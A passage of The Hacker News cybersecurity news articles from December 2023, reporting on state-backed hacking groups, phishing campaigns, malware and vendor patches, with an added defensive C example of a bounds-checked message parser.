"Midnight Blizzard took a kitchen sink approach, using password spray, credentials acquired from third-parties, believable social engineering campaigns via Teams, and abuse of cloud services to infiltrate cloud environments," the tech giant said.

Microsoft further highlighted a Russia-affiliated influence actor it calls Storm-1099 (aka Doppelganger) for carrying out sophisticated pro-Russia influence operations targeting international supporters of Ukraine since the spring of 2022.

Other influence efforts comprise spoofing mainstream media and deceptively editing celebrity videos shared on Cameo to propagate anti-Ukraine video content and malign President Volodymyr Zelensky by falsely claiming he suffered from substance abuse issues, underscoring continued efforts to warp global perceptions of the war.

"This campaign marks a novel approach by pro-Russia actors seeking to further the narrative in the online information space," Microsoft said. "Russian cyber and influence operators have demonstrated adaptability throughout the war on Ukraine."

Update
Following the publication of the story, Yaroslav Russkih, head of security at JetBrains, shared the following statement with The Hacker News -

"We were informed about this vulnerability earlier this year and immediately fixed it in TeamCity 2023.05.4 update, which was released on September 18, 2023. Since then, we have been contacting our customers directly or via public posts motivating them to update their software. We also released a dedicated security patch for organizations using older versions of TeamCity that they couldn't upgrade in time. In addition, we have been sharing the best security practices to help our customers strengthen the security of their build pipelines. As of right now, according to the statistics we have, fewer than 2% of TeamCity instances still operate unpatched software, and we hope their owners patch them immediately. This vulnerability only affects the on-premises instances of TeamCity, while our cloud version was not impacted."


New Hacker Group 'GambleForce' Targeting APAC Firms Using SQL Injection Attacks
14.12.23  Hacking  The Hacker News

A previously unknown hacker outfit called GambleForce has been attributed to a series of SQL injection attacks against companies primarily in the Asia-Pacific (APAC) region since at least September 2023.

"GambleForce uses a set of basic yet very effective techniques, including SQL injections and the exploitation of vulnerable website content management systems (CMS) to steal sensitive information, such as user credentials," Singapore-headquartered Group-IB said in a report shared with The Hacker News.

The group is estimated to have targeted 24 organizations in the gambling, government, retail, and travel sectors across Australia, Brazil, China, India, Indonesia, the Philippines, South Korea, and Thailand. Six of these attacks were successful.

The modus operandi of GambleForce is its exclusive reliance on open-source tools like dirsearch, sqlmap, tinyproxy, and redis-rogue-getshell at different stages of the attacks with the ultimate goal of exfiltrating sensitive information from compromised networks.

Also used by the threat actor is the legitimate post-exploitation framework known as Cobalt Strike. Interestingly, the version of the tool discovered on its attack infrastructure used commands in Chinese, although the group's origins are far from clear.


The attack chains entail the abuse of victims' public-facing applications through SQL injection, as well as the exploitation of CVE-2023-23752, a medium-severity flaw in Joomla CMS, to gain unauthorized access to a Brazilian company.

It's currently not known how GambleForce leverages the stolen information. The cybersecurity firm said it also took down the adversary's command-and-control (C2) server and notified the identified victims.

"Web injections are among the oldest and most popular attack vectors," Nikita Rostovcev, senior threat analyst at Group-IB, said.

"And the reason being is that sometimes developers overlook the importance of input security and data validation. Insecure coding practices, incorrect database settings, and outdated software create a fertile environment for SQL injection attacks on web applications."


Microsoft Takes Legal Action to Crack Down on Storm-1152's Cybercrime Network
14.12.23  Cyber  The Hacker News

Microsoft on Wednesday said it obtained a court order to seize infrastructure set up by a group called Storm-1152 that peddled roughly 750 million fraudulent Microsoft accounts and tools through a network of bogus websites and social media pages to other criminal actors, netting them millions of dollars in illicit revenue.

"Fraudulent online accounts act as the gateway to a host of cybercrime, including mass phishing, identity theft and fraud, and distributed denial-of-service (DDoS) attacks," Amy Hogan-Burney, the company's associate general counsel for cybersecurity policy and protection, said.

These cybercrime-as-a-service (CaaS) offerings, per Redmond, are designed to get around identity verification software across various technology platforms and help minimize the efforts needed to conduct malicious activities online, including phishing, spamming, ransomware, and fraud, effectively lowering the barriers to entry for attackers.

Multiple threat actors, counting Octo Tempest (aka Scattered Spider), are said to have used Storm-1152's accounts to pull off ransomware, data theft, and extortion schemes. Two other financially motivated threat actors that have purchased fraudulent accounts from Storm-1152 to scale their own attacks are Storm-0252 and Storm-0455.


The group, active since at least 2021, has been attributed to the following websites and pages -

Hotmailbox.me for selling fraudulent Microsoft Outlook accounts
1stCAPTCHA, AnyCAPTCHA, and NoneCAPTCHA for selling machine learning-based CAPTCHA solving services to bypass identity verification
Social media pages for advertising the services
Microsoft, which collaborated with Arkose Labs on the initiative, said it was able to identify three individuals based in Vietnam who were instrumental in developing and maintaining the infrastructure: Duong Dinh Tu, Linh Van Nguyễn (also known as Nguyễn Van Linh), and Tai Van Nguyen.

"These individuals operated and wrote the code for the illicit websites, published detailed step-by-step instructions on how to use their products via video tutorials and provided chat services to assist those using their fraudulent services," Hogan-Burney noted.

"Not only did the company sell its technology like any other kind of software company – with pricing structures based upon a customer's needs – but it also would perform fake account registration attacks, sell those fake accounts to other cybercriminals, and then cash out with cryptocurrency," Kevin Gosschalk and Patrice Boffa said.


BazaCall Phishing Scammers Now Leveraging Google Forms for Deception
14.12.23  Phishing  The Hacker News

The threat actors behind the BazaCall callback phishing attacks have been observed leveraging Google Forms to lend the scheme a veneer of credibility.

The method is an "attempt to elevate the perceived authenticity of the initial malicious emails," cybersecurity firm Abnormal Security said in a report published today.

BazaCall (aka BazarCall), which was first observed in late 2020, refers to a series of phishing attacks in which email messages impersonating legitimate subscription notices are sent to targets, urging them to contact a support desk to dispute or cancel the plan, or risk getting charged anywhere between $50 and $500.

By inducing a false sense of urgency, the attacker convinces the target over a phone call to grant them remote access capabilities using remote desktop software and ultimately establish persistence on the host under the guise of offering help to cancel the supposed subscription.

Some of the popular services that are impersonated include Netflix, Hulu, Disney+, Masterclass, McAfee, Norton, and GeekSquad.

In the latest attack variant detected by Abnormal Security, a form created using Google Forms is used as a conduit to share details of the purported subscription.

It's worth noting that the form has its response receipts enabled, which sends a copy of the response to the form respondent by email, so that the attacker can send an invitation to complete the form themselves and receive the responses.

"Because the attacker enabled the response receipt option, the target will receive a copy of the completed form, which the attacker has designed to look like a payment confirmation for Norton Antivirus software," security researcher Mike Britton said.

The use of Google Forms is also clever in that the responses are sent from the address "forms-receipts-noreply@google[.]com," which is a trusted domain and, therefore, has a higher chance of bypassing secure email gateways, as evidenced by a recent Google Forms phishing campaign uncovered by Cisco Talos last month.


"Additionally, Google Forms often use dynamically generated URLs," Britton explained. "The constantly changing nature of these URLs can evade traditional security measures that utilize static analysis and signature-based detection, which rely on known patterns to identify threats."

Threat Actor Targets Recruiters With More_eggs Backdoor
The disclosure arrives as Proofpoint revealed a new phishing campaign that's targeting recruiters with direct emails that ultimately lead to a JavaScript backdoor known as More_eggs.

The enterprise security firm attributed the attack wave to a "skilled, financially motivated threat actor" it tracks as TA4557, which has a track record of abusing legitimate messaging services and offering fake jobs via email to ultimately deliver the More_eggs backdoor.

"Specifically in the attack chain that uses the new direct email technique, once the recipient replies to the initial email, the actor was observed responding with a URL linking to an actor-controlled website posing as a candidate resume," Proofpoint said.


"Alternatively, the actor was observed replying with a PDF or Word attachment containing instructions to visit the fake resume website."

More_eggs is offered as malware-as-a-service, and is used by other prominent cybercriminal groups like Cobalt Group (aka Cobalt Gang), Evilnum, and FIN6. Earlier this year, eSentire linked the malware to two operators from Montreal and Bucharest.


Google Using Clang Sanitizers to Protect Android Against Cellular Baseband Vulnerabilities
13.12.23  OS  The Hacker News

Google is highlighting the role played by Clang sanitizers in hardening the security of the cellular baseband in the Android operating system and preventing specific kinds of vulnerabilities.

This comprises Integer Overflow Sanitizer (IntSan) and BoundsSanitizer (BoundSan), both of which are part of UndefinedBehaviorSanitizer (UBSan), a tool designed to catch various kinds of undefined behavior during program execution.

"They are architecture agnostic, suitable for bare-metal deployment, and should be enabled in existing C/C++ code bases to mitigate unknown vulnerabilities," Ivan Lozano and Roger Piqueras Jover said in a Tuesday post.

The development comes months after the tech giant said it's working with ecosystem partners to increase the security of firmware that interacts with Android, thereby making it difficult for threat actors to achieve remote code execution within the Wi-Fi SoC or the cellular baseband.

IntSan and BoundSan are two of the compiler-based sanitizers that Google has enabled as an exploit mitigation measure to detect arithmetic overflows and perform bounds checks around array accesses, respectively.

Google acknowledged that while both BoundSan and IntSan incur a substantial performance overhead, it has enabled them in security-critical attack surfaces ahead of a full-fledged rollout over the entire codebase. This covers -

Functions parsing messages delivered over the air in 2G, 3G, 4G, and 5G
Libraries encoding/decoding complex formats (e.g., ASN.1, XML, DNS, etc.)
IMS, TCP, and IP stacks, and
Messaging functions (SMS, MMS)
"In the particular case of 2G, the best strategy is to disable the stack altogether by supporting Android's '2G toggle,'" the researchers said. "However, 2G is still a necessary mobile access technology in certain parts of the world and some users might need to have this legacy protocol enabled."

It's worth noting that, the "tangible" benefits of deploying sanitizers notwithstanding, they do not address other classes of vulnerabilities, such as those related to memory safety, which necessitates transitioning the codebase to a memory-safe language like Rust.
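The kind of length-prefixed message parser the post is talking about, written as an added C example (not Google's baseband code) with the bounds and overflow checks stated explicitly; the record layout and sample bytes are constructed for the example, and the comments note which check BoundSan (`-fsanitize=bounds`) or IntSan (`-fsanitize=integer`) would otherwise have to catch at run time.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Record layout, constructed for this example (not a real 3GPP format):
 *   tag (1 byte) | len (2 bytes, big-endian) | value (len bytes)
 * Length-prefixed records like this are what over-the-air message
 * parsers and ASN.1-style decoders spend most of their time walking. */
enum { TLV_HDR = 3, TLV_MAX_VALUE = 256 };

typedef struct {
    uint8_t tag;
    uint16_t len;
    uint8_t value[TLV_MAX_VALUE];
} tlv_t;

/* Parse one record at *off; on success copy it to *out and advance *off.
 * Each explicit check below corresponds to a trap that IntSan (unsigned
 * wrap-around) or BoundSan (array indexing) would raise at run time if
 * the check had been forgotten: the explicit form is what we want in the
 * code, the sanitizer is the backstop for the cases nobody thought of. */
bool tlv_parse_one(const uint8_t *buf, size_t buflen, size_t *off, tlv_t *out)
{
    size_t pos = *off;
    size_t end;

    /* Header must fit. The guard on buflen keeps "buflen - TLV_HDR" from
     * wrapping: without it a buffer shorter than a header would wrap to a
     * huge value and the comparison would pass, which is exactly the
     * unsigned wrap-around IntSan reports. */
    if (buflen < TLV_HDR || pos > buflen - TLV_HDR)
        return false;

    out->tag = buf[pos];
    out->len = (uint16_t)((buf[pos + 1] << 8) | buf[pos + 2]);

    /* Value must fit the fixed-size destination array: without this check
     * the memcpy below writes past out->value, a BoundSan-class bug. */
    if (out->len > TLV_MAX_VALUE)
        return false;

    /* Value must fit the input; the builtin keeps the addition from
     * wrapping on a hostile length field. */
    if (__builtin_add_overflow(pos + TLV_HDR, (size_t)out->len, &end) ||
        end > buflen)
        return false;

    memcpy(out->value, buf + pos + TLV_HDR, out->len);
    *off = end;
    return true;
}

/* Count well-formed records, stopping at the first malformed one. */
size_t tlv_count(const uint8_t *buf, size_t buflen)
{
    size_t off = 0, n = 0;
    tlv_t rec;

    while (off < buflen && tlv_parse_one(buf, buflen, &off, &rec))
        n++;
    return n;
}

/* Constructed sample inputs. */
static const uint8_t SAMPLE_OK[] = {
    0x01, 0x00, 0x02, 0xAA, 0xBB,   /* tag 1, len 2 */
    0x02, 0x00, 0x01, 0xCC          /* tag 2, len 1 */
};
static const uint8_t SAMPLE_TRUNC[] = {
    0x01, 0x00, 0x05, 0xAA          /* claims 5 value bytes, only 1 present */
};
static const uint8_t SAMPLE_OVERSIZE[] = {
    0x01, 0xFF, 0xFF, 0x00          /* len 65535 exceeds TLV_MAX_VALUE */
};

int main(void)
{
    printf("ok: %zu records\n", tlv_count(SAMPLE_OK, sizeof SAMPLE_OK));
    printf("truncated: %zu records\n", tlv_count(SAMPLE_TRUNC, sizeof SAMPLE_TRUNC));
    printf("oversize: %zu records\n", tlv_count(SAMPLE_OVERSIZE, sizeof SAMPLE_OVERSIZE));
    return 0;
}
```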

In early October 2023, Google announced that it had rewritten the Android Virtualization Framework's (AVF) protected VM (pVM) firmware in Rust to provide a memory-safe foundation for the pVM root of trust.

"As the high-level operating system becomes a more difficult target for attackers to successfully exploit, we expect that lower level components such as the baseband will attract more attention," the researchers concluded.

"By using modern toolchains and deploying exploit mitigation technologies, the bar for attacking the baseband can be raised as well."


Microsoft Warns of Hackers Exploiting OAuth for Cryptocurrency Mining and Phishing
13.12.23  Exploit  The Hacker News

Microsoft has warned that adversaries are using OAuth applications as an automation tool to deploy virtual machines (VMs) for cryptocurrency mining and launch phishing attacks.

"Threat actors compromise user accounts to create, modify, and grant high privileges to OAuth applications that they can misuse to hide malicious activity," the Microsoft Threat Intelligence team said in an analysis.

"The misuse of OAuth also enables threat actors to maintain access to applications even if they lose access to the initially compromised account."

OAuth, short for Open Authorization, is an authorization and delegation framework (as opposed to authentication) that provides applications the ability to securely access information from other websites without handing over passwords.

In the attacks detailed by Microsoft, threat actors have been observed launching phishing or password-spraying attacks against poorly secured accounts with permissions to create or modify OAuth applications.


One such adversary is Storm-1283, which has leveraged a compromised user account to create an OAuth application and deploy VMs for cryptomining. Furthermore, the attackers modified existing OAuth applications that the account had access to by adding an extra set of credentials to facilitate the same goals.

In another instance, an unidentified actor compromised user accounts and created OAuth applications to maintain persistence and to launch email phishing attacks that employ an adversary-in-the-middle (AiTM) phishing kit to plunder session cookies from their targets and bypass authentication measures.

"In some cases, following the stolen session cookie replay activity, the actor leveraged the compromised user account to perform BEC financial fraud reconnaissance by opening email attachments in Microsoft Outlook Web Application (OWA) that contain specific keywords such as 'payment' and 'invoice,'" Microsoft said.

Other scenarios detected by the tech giant following the theft of session cookies involve the creation of OAuth applications to distribute phishing emails and conduct large-scale spamming activity. Microsoft is tracking the latter as Storm-1286.

To mitigate the risks associated with such attacks, it's recommended that organizations enforce multi-factor authentication (MFA), enable conditional access policies, and routinely audit apps and consented permissions.


Major Cyber Attack Paralyzes Kyivstar - Ukraine's Largest Telecom Operator
13.12.23  BigBrothers  The Hacker News

Ukraine's biggest telecom operator Kyivstar has become the victim of a "powerful hacker attack," disrupting customer access to mobile and internet services.

"The cyberattack on Ukraine's #Kyivstar telecoms operator has impacted all regions of the country with high impact to the capital, metrics show, with knock-on impacts reported to air raid alert network and banking sector as work continues to restore connectivity," NetBlocks said in a series of posts on X (formerly Twitter).

Kyivstar, which is owned by Dutch-domiciled multinational telecommunication services company VEON, serves nearly 25 million mobile subscribers and more than 1 million home internet customers.

The company said the attack was "a result of" the war with Russia and that it has notified law enforcement and special state services. While Kyivstar is working to restore the services, the internet watchdog noted that the telco is largely offline.

That said, Kyivstar has yet to provide details about the nature of the attacks and what caused the shutdown. There is no evidence that the personal data of subscribers has been compromised in the incident.

"After stabilizing the network, all subscribers and corporate clients who as a result of a hacking attack could not use the services of the company, will definitely receive compensation," Kyivstar said in an update posted on Facebook.


Source: NetBlocks
It's also urging users to be on the lookout for scams aiming to trick users into sharing their personal details and that "news about compensation and the timing of the network restoration will come exclusively from the company's official pages."

The pro-Russia hacktivist group KillNet claimed responsibility for the attack on Telegram, but did not offer any additional evidence to back its claims.

KillNet is coming off a few chaotic weeks of its own after the Russia-based Gazeta.ru unmasked the real-world identity of its leader — who goes by the online alias KillMilk — as Nikolai Serafimov, a 30-year-old Russian citizen.

KillMilk has since announced his retirement, appointing in his place a new head named "Deanon Club," who has claimed that "there will be a large-scale recruitment for the KillNet team, on all fronts" with the goal of striking government financial facilities, encryption firms, and the gambling sector.

The development also comes as the Defence Intelligence of Ukraine (GUR) revealed that it hacked into Russia's Federal Taxation Service (FNS) servers and wiped all its data. Office.ed-it.ru, a Russian IT company that served as a database for the FNS, was also reportedly affected by the attack.

"During the special operation, military intelligence officers managed to infiltrate one of the well-protected key central servers of the Federal Tax Service (FTS of the Russian Federation), and then more than 2300 of its regional servers throughout Russia, as well as on the territory of the temporarily occupied Crimea," the agency said.

Last month, GUR announced that it was behind a cyber assault against the Russian government's Federal Air Transport Agency (FATA), which is also known as Rosaviatsia. The attack allowed it to access “a large volume of confidential documents,” including a list of daily reports spanning more than a year and a half, it said.

However, Anton Gorelkin, a Russian politician and lawmaker, said in a message on Telegram that the attack on FNS is fiction, adding it is an attempt on part of the Ukrainian government to "respond to their problems with Kyivstar."


Microsoft's Final 2023 Patch Tuesday: 33 Flaws Fixed, Including 4 Critical
13.12.23  Vulnerability  The Hacker News

Microsoft released its final set of Patch Tuesday updates for 2023, closing out 33 flaws in its software, making it one of the lightest releases in recent years.

Of the 33 shortcomings, four are rated Critical and 29 are rated Important in severity. The fixes are in addition to 18 flaws Microsoft addressed in its Chromium-based Edge browser since the release of Patch Tuesday updates for November 2023.

According to data from the Zero Day Initiative, the software giant has patched more than 900 flaws this year, making it one of the busiest years for Microsoft patches. For comparison, Redmond resolved 917 CVEs in 2022.

While none of the vulnerabilities are listed as publicly known or under active attack at the time of release, some of the notable ones are listed below -

CVE-2023-35628 (CVSS score: 8.1) - Windows MSHTML Platform Remote Code Execution Vulnerability
CVE-2023-35630 (CVSS score: 8.8) - Internet Connection Sharing (ICS) Remote Code Execution Vulnerability
CVE-2023-35636 (CVSS score: 6.5) - Microsoft Outlook Information Disclosure Vulnerability
CVE-2023-35639 (CVSS score: 8.8) - Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2023-35641 (CVSS score: 8.8) - Internet Connection Sharing (ICS) Remote Code Execution Vulnerability
CVE-2023-35642 (CVSS score: 6.5) - Internet Connection Sharing (ICS) Denial-of-Service Vulnerability
CVE-2023-36019 (CVSS score: 9.6) - Microsoft Power Platform Connector Spoofing Vulnerability
CVE-2023-36019 is also significant because it allows the attacker to send a specially crafted URL to the target, resulting in the execution of malicious scripts in the victim's browser on their machine.

"An attacker could manipulate a malicious link, application, or file to disguise it as a legitimate link or file to trick the victim," Microsoft said in an advisory.

Microsoft's Patch Tuesday update also plugs three flaws in the Dynamic Host Configuration Protocol (DHCP) server service that could lead to a denial-of-service or information disclosure -

CVE-2023-35638 (CVSS score: 7.5) - DHCP Server Service Denial-of-Service Vulnerability
CVE-2023-35643 (CVSS score: 7.5) - DHCP Server Service Information Disclosure Vulnerability
CVE-2023-36012 (CVSS score: 5.3) - DHCP Server Service Information Disclosure Vulnerability
The disclosure also comes as Akamai discovered a new set of attacks against Active Directory domains that use Microsoft Dynamic Host Configuration Protocol (DHCP) servers.

"These attacks could allow attackers to spoof sensitive DNS records, resulting in varying consequences from credential theft to full Active Directory domain compromise," Ori David said in a report last week. "The attacks don't require any credentials, and work with the default configuration of Microsoft DHCP server."

The web infrastructure and security company further noted the impact of the flaws can be significant as they can be exploited to spoof DNS records on Microsoft DNS servers, including an unauthenticated arbitrary DNS record overwrite, thereby enabling an actor to gain a machine-in-the-middle position on hosts in the domain and access sensitive data.

Microsoft, in response to the findings, said the "problems are either by design, or not severe enough to receive a fix," necessitating that users disable DHCP DNS Dynamic Updates if not required and refrain from using DNSUpdateProxy.


Russian APT28 Hackers Targeting 13 Nations in Ongoing Cyber Espionage Campaign
13.12.23  APT  The Hacker News

The Russian nation-state threat actor known as APT28 has been observed making use of lures related to the ongoing Israel-Hamas war to facilitate the delivery of a custom backdoor called HeadLace.

IBM X-Force is tracking the adversary under the name ITG05, which is also known as BlueDelta, Fancy Bear, Forest Blizzard (formerly Strontium), FROZENLAKE, Iron Twilight, Sednit, Sofacy, and TA422.

"The newly discovered campaign is directed against targets based in at least 13 nations worldwide and leverages authentic documents created by academic, finance and diplomatic centers," security researchers Golo Mühr, Claire Zaboeva, and Joe Fasulo said.

"ITG05's infrastructure ensures only targets from a single specific country can receive the malware, indicating the highly targeted nature of the campaign."

Targets of the campaign include Hungary, Türkiye, Australia, Poland, Belgium, Ukraine, Germany, Azerbaijan, Saudi Arabia, Kazakhstan, Italy, Latvia, and Romania.

The campaign involves the use of decoys that are designed to primarily single out European entities with a "direct influence on the allocation of humanitarian aid," leveraging documents associated with the United Nations, the Bank of Israel, the U.S. Congressional Research Service, the European Parliament, a Ukrainian think tank, and an Azerbaijan-Belarus Intergovernmental Commission.

Some of the attacks have been found to employ RAR archives exploiting the WinRAR flaw called CVE-2023-38831 to propagate HeadLace, a backdoor that was first disclosed by the Computer Emergency Response Team of Ukraine (CERT-UA) in attacks aimed at critical infrastructure in the country.

It's worth noting that Zscaler revealed a similar campaign named Steal-It in late September 2023 that enticed targets with adult-themed content to trick them into parting with sensitive information.

The disclosure comes a week after Microsoft, Palo Alto Networks Unit 42, and Proofpoint detailed the threat actor's exploitation of a critical security flaw of Microsoft Outlook (CVE-2023-23397, CVSS score: 9.8) to gain unauthorized access to victims' accounts within Exchange servers.

The reliance on official documents as lures, therefore, marks a deviation from previously observed activity, "indicative of ITG05's increased emphasis on a unique target audience whose interests would prompt interaction with material impacting emerging policy creation."

"It is highly likely the compromise of any echelon of global foreign policy centers may aid officials' interests with advanced insight into critical dynamics surrounding the International Community's (IC) approach to competing priorities for security and humanitarian assistance," the researchers said.

The development also follows a new advisory in which CERT-UA linked the threat actor known as UAC-0050 to a massive email-based phishing attack against Ukraine and Poland using Remcos RAT and Meduza Stealer.


New MrAnon Stealer Malware Targeting German Users via Booking-Themed Scam
12.12.23  Virus  The Hacker News

A phishing campaign has been observed delivering information-stealing malware called MrAnon Stealer to unsuspecting victims via seemingly benign booking-themed PDF lures.

"This malware is a Python-based information stealer compressed with cx-Freeze to evade detection," Fortinet FortiGuard Labs researcher Cara Lin said. "MrAnon Stealer steals its victims' credentials, system information, browser sessions, and cryptocurrency extensions."

There is evidence to suggest that Germany is the primary target of the attack as of November 2023, owing to the number of times the downloader URL hosting the payload has been queried.

Masquerading as a company looking to book hotel rooms, the phishing email bears a PDF file that, upon opening, activates the infection by prompting the recipient to download an updated version of Adobe Flash.

Doing so results in the execution of .NET executables and PowerShell scripts to ultimately run a pernicious Python script, which is capable of gathering data from several applications and exfiltrating it to a public file-sharing website and the threat actor's Telegram channel.

It's also capable of capturing information from instant messaging apps, VPN clients, and files matching a desired list of extensions.

MrAnon Stealer is offered by the authors for $500 per month (or $750 for two months), alongside a crypter ($250 per month) and a stealthy loader ($250 per month).

"The campaign initially disseminated Cstealer in July and August but transitioned to distributing MrAnon Stealer in October and November," Lin said. "This pattern suggests a strategic approach involving the continued use of phishing emails to propagate a variety of Python-based stealers."

The disclosure comes as the China-linked Mustang Panda is behind a spear-phishing email campaign targeting the Taiwanese government and diplomats with an aim to deploy SmugX, a new variant of the PlugX backdoor that was previously uncovered by Check Point in July 2023.


Apple Releases Security Updates to Patch Critical iOS and macOS Security Flaws
12.12.23  OS  The Hacker News

Apple on Monday released security patches for iOS, iPadOS, macOS, tvOS, watchOS, and Safari web browser to address multiple security flaws, in addition to backporting fixes for two recently disclosed zero-days to older devices.

This includes updates for 12 security vulnerabilities in iOS and iPadOS spanning AVEVideoEncoder, ExtensionKit, Find My, ImageIO, Kernel, Safari Private Browsing, and WebKit. macOS Sonoma 14.2, for its part, resolves 39 shortcomings, counting six bugs impacting the ncurses library.

Notable among the flaws is CVE-2023-45866, a critical security issue in Bluetooth that could allow an attacker in a privileged network position to inject keystrokes by spoofing a keyboard.

The vulnerability was disclosed by SkySafe security researcher Marc Newlin last week. It has been remediated in iOS 17.2, iPadOS 17.2, and macOS Sonoma 14.2 with improved checks, the iPhone maker said.

Also released by Apple is Safari 17.2, containing fixes for two WebKit flaws – CVE-2023-42890 and CVE-2023-42883 – that could lead to arbitrary code execution and a denial-of-service (DoS) condition. The update is available for Macs running macOS Monterey and macOS Ventura.

iOS 17.2 and iPadOS 17.2, besides addressing a Siri bug that could allow an adversary with physical access to obtain sensitive data, packs in a security upgrade in the form of Contact Key Verification, which ensures privacy of iMessage conversations by enabling users to verify the contacts they are communicating with.

"iMessage Contact Key Verification advances the state of the art of Key Transparency deployments by having user devices themselves verify consistency proofs and ensure consistency of the KT system across all user devices for an account," Apple noted in a technical explainer in October 2023.

"These improvements protect against key directory compromise as well as compromise of the transparency service itself, and can detect split views presented by both services."

Coinciding with the updates, Apple has also released iOS 16.7.3 and iPadOS 16.7.3 to close out as many as eight security issues, two of which relate to WebKit (CVE-2023-42916 and CVE-2023-42917) and were disclosed by Redmond as having been actively exploited in the wild earlier this month.

Both the vulnerabilities have been patched in tvOS 17.2 and watchOS 10.2 as well. No additional details are available as yet regarding the nature of the exploitation and the threat actors that may be using them.


New Critical RCE Vulnerability Discovered in Apache Struts 2 - Patch Now
12.12.23  Vulnerability  The Hacker News

Apache has released a security advisory warning of a critical security flaw in the Struts 2 open-source web application framework that could result in remote code execution.

Tracked as CVE-2023-50164, the vulnerability is rooted in a flawed "file upload logic" that could enable unauthorized path traversal and could be exploited under the circumstances to upload a malicious file and achieve execution of arbitrary code.

Struts is a Java framework that uses the Model-View-Controller (MVC) architecture for building enterprise-oriented web applications.

Steven Seeley of Source Incite has been credited with discovering and reporting the flaw, which impacts the following versions of the software -

Struts 2.3.37 (EOL)
Struts 2.5.0 - Struts 2.5.32, and
Struts 6.0.0 - Struts 6.3.0

Patches for the bug are available in versions 2.5.33 and 6.3.0.2 or greater. There are no workarounds that remediate the issue.

"All developers are strongly advised to perform this upgrade," the project maintainers said in an advisory posted last week. "This is a drop-in replacement and upgrade should be straightforward."

While there is no evidence that the vulnerability is being maliciously exploited in real-world attacks, a prior security flaw in the software (CVE-2017-5638, CVSS score: 10.0) was weaponized by threat actors to breach consumer credit reporting agency Equifax in 2017.


Researchers Unmask Sandman APT's Hidden Link to China-Based KEYPLUG Backdoor
11.12.23  APT  The Hacker News

Tactical and targeting overlaps have been discovered between the enigmatic advanced persistent threat (APT) called Sandman and a China-based threat cluster that's known to use a backdoor known as KEYPLUG.

The assessment comes jointly from SentinelOne, PwC, and the Microsoft Threat Intelligence team based on the fact that the adversary's Lua-based malware LuaDream and KEYPLUG have been determined to cohabit "in the same victim networks."

Microsoft and PwC are tracking the activity under the names Storm-0866 and Red Dev 40, respectively.

"Sandman and Storm-0866/Red Dev 40 share infrastructure control and management practices, including hosting provider selections, and domain naming conventions," the companies said in a report shared with The Hacker News.

"The implementation of LuaDream and KEYPLUG reveals indicators of shared development practices and overlaps in functionalities and design, suggesting shared functional requirements by their operators."

Sandman was first exposed by SentinelOne in September 2023, detailing its attacks on telecommunication providers in the Middle East, Western Europe, and South Asia using a novel implant codenamed LuaDream. The intrusions were recorded in August 2023.

Storm-0866/Red Dev 40, on the other hand, refers to an emerging APT cluster primarily singling out entities in the Middle East and the South Asian subcontinent, including telecommunication providers and government entities.

One of the key tools in Storm-0866's arsenal is KEYPLUG, a backdoor that was first disclosed by Google-owned Mandiant as part of attacks mounted by the China-based APT41 (aka Brass Typhoon or Barium) actor to infiltrate six U.S. state government networks between May 2021 and February 2022.

In a report published earlier this March, Recorded Future attributed the use of KEYPLUG to a Chinese state-sponsored threat activity group it's tracking as RedGolf, which it said "closely overlaps with threat activity reported under the aliases of APT41/BARIUM."

"A close examination of the implementation and C2 infrastructure of these distinct malware strains revealed indicators of shared development as well as infrastructure control and management practices, and some overlaps in functionalities and design, suggesting shared functional requirements by their operators," the companies pointed out.

One of the notable overlaps involves two LuaDream C2 domains named "dan.det-ploshadka[.]com" and "ssl.e-novauto[.]com," the latter of which has also been put to use as a KEYPLUG C2 server and has been tied to Storm-0866.

Another interesting commonality between LuaDream and KEYPLUG is that both the implants support QUIC and WebSocket protocols for C2 communications, indicating common requirements and the likely presence of a digital quartermaster behind the coordination.

"The order in which LuaDream and KEYPLUG evaluate the configured protocol among HTTP, TCP, WebSocket, and QUIC is the same: HTTP, TCP, WebSocket, and QUIC in that order," the researchers said. "The high-level execution flows of LuaDream and KEYPLUG are very similar."

The adoption of Lua is another sign that threat actors, both nation-state aligned and cybercrime-focused, are increasingly setting their sights on uncommon programming languages like DLang and Nim to evade detection and persist in victim environments for extended periods of time.

Lua-based malware, in particular, has been spotted only a handful of times in the wild over the past decade. This includes Flame, Animal Farm (aka SNOWGLOBE), and Project Sauron.

"There are strong overlaps in operational infrastructure, targeting, and TTPs associating the Sandman APT with China-based adversaries using the KEYPLUG backdoor, STORM-0866/Red Dev 40 in particular," the researchers said. "This highlights the complex nature of the Chinese threat landscape."


Lazarus Group Using Log4j Exploits to Deploy Remote Access Trojans
11.12.23  APT  The Hacker News

The notorious North Korea-linked threat actor known as the Lazarus Group has been attributed to a new global campaign that involves the opportunistic exploitation of security flaws in Log4j to deploy previously undocumented remote access trojans (RATs) on compromised hosts.

Cisco Talos is tracking the activity under the name Operation Blacksmith, noting the use of three DLang-based malware families, including a RAT called NineRAT that leverages Telegram for command-and-control (C2), DLRAT, and a downloader dubbed BottomLoader.

The cybersecurity firm described the latest tactics of the adversary as a definitive shift and that they overlap with the cluster widely tracked as Andariel (aka Onyx Sleet or Silent Chollima), a sub-group within the Lazarus umbrella.

"Andariel is typically tasked with initial access, reconnaissance and establishing long term access for espionage in support of the North Korean government's national interests," Talos researchers Jung soo An, Asheer Malhotra, and Vitor Ventura said in a technical report shared with The Hacker News.

Attack chains involve the exploitation of CVE-2021-44228 (aka Log4Shell) against publicly-accessible VMware Horizon servers to deliver NineRAT. Some of the prominent sectors targeted include manufacturing, agriculture, and physical security.

The abuse of Log4Shell is not surprising given the fact that 2.8% of applications are still using vulnerable versions of the library (from 2.0-beta9 through 2.15.0) after two years of public disclosure, according to Veracode, with another 3.8% using Log4j 2.17.0, which, while not vulnerable to CVE-2021-44228, is susceptible to CVE-2021-44832.

NineRAT, first developed around May 2022, is said to have been put to use as early as March 2023 in an attack aimed at a South American agricultural organization and then again in September 2023 on a European manufacturing entity. By using a legitimate messaging service for C2 communications, the goal is to evade detection.

The malware acts as the primary means of interaction with the infected endpoint, enabling the attackers to send commands to gather system information, upload files of interest, download additional files, and even uninstall and upgrade itself.

"Once NineRAT is activated it accepts preliminary commands from the telegram based C2 channel, to again fingerprint the infected systems," the researchers noted.

"Re-fingerprinting of infected systems indicates that the data collected by Lazarus via NineRAT may be shared by other APT groups and essentially resides in a different repository from the fingerprint data collected initially by Lazarus during their initial access and implant deployment phase."

